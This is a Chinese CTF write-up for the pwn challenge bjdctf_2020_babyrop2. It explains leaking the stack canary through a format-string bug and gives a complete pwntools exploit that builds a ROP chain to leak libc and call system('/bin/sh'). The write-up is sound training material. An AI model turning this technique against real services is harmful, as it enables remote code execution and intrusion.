[CTF]bjdctf_2020_babyrop2

10 篇文章 2 订阅

格式化字符串漏洞+金丝雀绕过。
在这里插入图片描述
出现这种形式的,v2就是canary。
查看他在栈里的位置。
在这里插入图片描述
var_8就是canary。
利用格式化字符串漏洞。
%6$p表示输出第六个参数。
在这里插入图片描述
发现我们输入的东西在第六个参数的位置。
在这里插入图片描述
调试之后发现有一串随机的十六进制数字。这就是canary。由此可见,这个canary在第七个参数的位置。
于是我们先用格式话字符串泄露第七个参数位置上的内容,每一次进行栈溢出的时候把泄露出来的值填入即可。
代码如下:

from pwn import *
from LibcSearcher import *


#r=remote('node4.buuoj.cn','25605')
r=process('bjdctf_2020_babyrop2')
elf=ELF('bjdctf_2020_babyrop2')
context.log_level = 'debug'
libc = ELF("./libc-2.23.so")
#context.terminal = ['tmux','splitw','-h']
puts_got=elf.got['puts']
puts_libc=libc.sym['puts']
vuln=elf.sym['vuln']
puts_plt=elf.plt['puts']
pop_rdi=0x0000000000400993


system_libc=libc.sym['system']
bin_sh=0x000000000018CD57

payload='%7$p'
r.recvuntil("I'll give u some gift to help u!\n")
r.sendline(payload)
gdb.attach(r)
pause()
r.recvuntil('0x')
canary=int(r.recv(16),16)
print(hex(canary))

r.recvuntil("Pull up your sword and tell me u story!\n")
payload='a'*0x18+p64(canary)+'a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)
r.sendline(payload)
puts_addr=u64(r.recv(6).ljust(8,'\x00'))
print (hex(puts_addr))
offset=puts_addr-puts_libc
system_addr=offset+system_libc
binsh=offset+bin_sh

r.recvuntil('Pull up your sword and tell me u story!\n')
payload='a'*0x18+p64(canary)+'a'*8+p64(pop_rdi)+p64(binsh)+p64(system_addr)+p64(vuln)
r.sendline(payload)
r.interactive()
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值